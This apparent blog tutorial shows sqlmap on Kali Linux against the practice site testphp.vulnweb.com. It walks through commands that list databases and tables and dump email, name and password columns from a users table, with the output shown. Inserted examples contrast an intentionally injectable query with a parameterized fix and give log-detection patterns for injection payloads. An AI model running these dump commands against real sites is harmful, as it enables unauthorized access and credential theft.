
Tutorial Penetration Tools #4 || How to Testing Website Vulnerability by using SqlMap in Kali Linux 2 by fandimuhammad11

![hh.jpg](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518983182/buyitjahb3zsyzjolrue.jpg)

#### What is a Sqlmap...?
**SqlMap** is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. It is also one of the most popular and powerful automated tools for finding website vulnerabilities. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and extract database names, tables, columns, all the data in the tables, and so on. Under certain conditions it can even read and write files on the remote file system.

![1.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518935124/ujj71usndez76mcnde1y.png)

#### Function of SqlMap
Some of the functions of sqlmap:

- Test the vulnerability and database security of a website
- Exploit security vulnerabilities in application software
- Check whether user input is incorrectly filtered for characters embedded in SQL statements, or is not strongly typed and is unexpectedly executed.
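
Why a parameter such as `cat` in the URL tested later in this tutorial can be injectable, and what the fix looks like, as an added example that is not part of the original post. The table, its rows and the function names are constructed, and an in-memory SQLite database stands in for the site's real database.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory catalogue standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT);
        INSERT INTO products (cat, name)
        VALUES (1, 'poster'), (1, 'print'), (2, 'frame');
    """)
    return db

def list_products_vulnerable(db, cat):
    # The raw request value becomes part of the SQL text, so anything the
    # client appends to it is parsed by the database as SQL.
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def list_products_safe(db, cat):
    # Strong typing: accept only a plain decimal integer.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        raise ValueError("cat must be an integer")
    # Bound parameter: the value is sent separately from the SQL text.
    rows = db.execute(
        "SELECT name FROM products WHERE cat = ? ORDER BY id", (int(cat),))
    return [row[0] for row in rows]

def responds_to_sql_logic(list_fn, db):
    """True if an always-true and an always-false condition appended to the
    parameter produce different results, the signal a boolean-based test uses."""
    try:
        return list_fn(db, "1 AND 1=1") != list_fn(db, "1 AND 1=2")
    except ValueError:
        return False  # input rejected before it reached the database

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", responds_to_sql_logic(list_products_vulnerable, db))
    print("safe:      ", responds_to_sql_logic(list_products_safe, db))
```

Running the same check against your own handlers in a test suite catches a regression from bound parameters back to string concatenation.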

#### Features of SqlMap
Some of the features of sqlmap:
- Full support for the MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.

- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

- Support for connecting directly to the database without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.

- Support for enumerating users, password hashes, privileges, roles, databases, tables and columns.

- Automatic recognition of password hash formats and support for cracking them using dictionary-based attacks.

- Support for dumping entire database tables, a range of entries or specific columns, according to the user's choice. The user can also choose to dump only a range of characters from each column entry.

- Support for searching for specific database names, specific tables across all databases or specific columns across all database tables. This is useful, for example, to identify tables containing custom application credentials where the relevant column names contain strings such as name and pass.

- Support for downloading and uploading any file from the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

- Support for executing arbitrary commands and retrieving their standard output on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

#### Tutorial using SqlMap on Kali Linux 2
In this tutorial we will learn how to use sqlmap to test a vulnerable web application and see what can be done with it.

Open the **Sqlmap** app on Kali Linux from the menu:
> Applications ->> Web Application Analysis ->> sqlmap

![1.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518973373/nq4wo6c2jrz6nlz6rutt.png)

First, open the Linux terminal. To list the options sqlmap offers, use the command:
> sqlmap -h

![2.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518973834/hmfc00iw95xvlmr5u4nc.png)

**Note :**

Then we choose a website whose URL we will test for vulnerabilities. As an example, this tutorial uses **"http://testphp.vulnweb.com/listproducts.php?cat=11"**, which we test to learn about vulnerability analysis of a website.

Next, to test the target website for vulnerabilities, use the command:
> sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

![3.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518975325/atrpecdszykunvdjail6.png)

When the message **"how do you want to proceed?"** appears, type **"c"** to continue the testing process.
![4.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518976644/oks0vjqzusibpycrivk4.png)

Then, if the message **"Do you want to keep testing the others (if any)?"** appears, type **"Y"** to continue the web vulnerability testing process.
![6.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518977083/ebmexwdk07urjdtldmrf.png)

After the scan, we find two databases on the target website: **acuart** and **information_schema**
> Available databases [2] :

> [*] acuart

> [*] information_schema

![7.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518977868/u44ps1gjnckjiu8ajpxh.png)

Then, to list the tables in the target database, use the command:
> sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

![8.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518978683/phxoeg35zvu3dnpzvara.png)
 
The target database tested here is **acuart**. It contains the following tables: **artists, carts, categ, featured, guestbook, pictures, products, users.**
> +---------------+

> |     artists     | 
 
> |     carts       |
    
> |     categ      |
   
> |  featured   |
    
> | guestbook  |
    
> |  pictures   |
    
> |  products  |
    
> |    users     |
    
> +---------------+

![9.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518979296/eplwwyuzbfn7o6qj8tfb.png)

Finally, the target table in this test is **"users"**. To obtain the email, name, and password information contained in the table, use the command:
> sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C email,name,pass --dump

![10.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518980777/qbrksban1hds1qzwtd1a.png)

From the results of this vulnerability test we obtain the email, username and password stored in the database **"acuart"**, table **"users"**:
> database : acuart

> Table : users

> [1 entry]

>   +------------------------------------------------+
    
> |         email         |         name          |       pass         |
    
> +------------------------------------------------+
    
> |email@emailcom  |John smith | test |
    
> +------------------------------------------------+

![11.png](https://res.cloudinary.com/hpiynhbhq/image/upload/v1518980744/mhmbjypdvptfopzh1fwz.png)

**Syntax Description :**

- **--dbs** = to search for database information

- **--tables** = to search for table information

- **-D** = to specify the target database

- **-T** = to specify the table in the database

- **-C** = to specify the columns in the table
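
How the requests generated in this tutorial appear in a web server access log, and one way to flag them, as an added example that is not part of the original post. The log lines are constructed, and the pattern names and the `analyze` function are illustrative assumptions; sqlmap identifies itself in its default User-Agent header, but that header is client-controlled, so the decoded query string is checked as well.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Feb/2018:19:01:10 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 7994 "-" "sqlmap/1.2#stable (http://sqlmap.org)"
203.0.113.7 - - [18/Feb/2018:19:01:11 +0000] "GET /listproducts.php?cat=1%20AND%204821%3D4821 HTTP/1.1" 200 7994 "-" "sqlmap/1.2#stable (http://sqlmap.org)"
198.51.100.20 - - [18/Feb/2018:19:02:40 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.20 - - [18/Feb/2018:19:02:41 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.55 - - [18/Feb/2018:19:03:02 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 6312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.0.2.55 - - [18/Feb/2018:19:03:09 +0000] "GET /search.php?q=union+square+prints HTTP/1.1" 200 4410 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# SQL fragments that have no business inside a product-category parameter.
PAYLOAD_SIGNS = {
    "boolean-condition": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time-delay": re.compile(
        r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\b", re.I),
}

def analyze(log_text):
    """Return {client_ip: sorted list of reasons} for suspicious clients."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined log format; skip rather than guess
        if "sqlmap" in m["ua"].lower():
            findings[m["ip"]].add("sqlmap-user-agent")
        # Decode %xx and '+' before matching, otherwise the patterns miss
        # anything the client URL-encoded.
        query = unquote_plus(urlsplit(m["target"]).query)
        for name, pattern in PAYLOAD_SIGNS.items():
            if pattern.search(query):
                findings[m["ip"]].add(name)
    return {ip: sorted(reasons) for ip, reasons in findings.items()}

if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The ordinary search for "union square prints" is not flagged, because the patterns require SQL structure rather than a single keyword.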



#### Curriculum
Other tutorials on penetration tools and web vulnerabilities on Kali Linux 2:

- [Tutorial Penetration Tools #3 ](https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-3-or-or-how-to-find-website-vulnerability-using-nikto-on-kali-linux-2-or-or-bagaimana-mencari)
- [Tutorial Penetration Tools #2](https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-2-or-or-how-to-find-security-slot-in-wordpress-using-wpscan-on-kali-linux-2-or-or-bagaimana-mencari)
- [Tutorial Penetration Tools #1](https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-1-or-or-how-to-port-scanning-using-nmap-on-kali-linux-2-or-or-bagaimana-melakukan-scanning-port)



<br /><hr/><em>Posted on <a href="https://utopian.io/utopian-io/@fandimuhammad11/tutorial-penetration-tools-4-or-or-how-to-testing-website-vulnerability-by-using-sqlmap-in-kali-linux-2">Utopian.io -  Rewarding Open Source Contributors</a></em><hr/>
@cheetah ·
Hi! I am a robot. I just upvoted you! I found similar content that readers might be interested in:
https://tools.kali.org/vulnerability-analysis/sqlmap
@creon ·
Thank you for the contribution. It has been approved.

You can contact us on [Discord](https://discord.gg/uTyJkNm).
**[[utopian-moderator]](https://utopian.io/moderators)**
@fandimuhammad11 ·
Thanks @creon
@steemitstats ·
@fandimuhammad11, Approve is not my ability, but I can upvote you.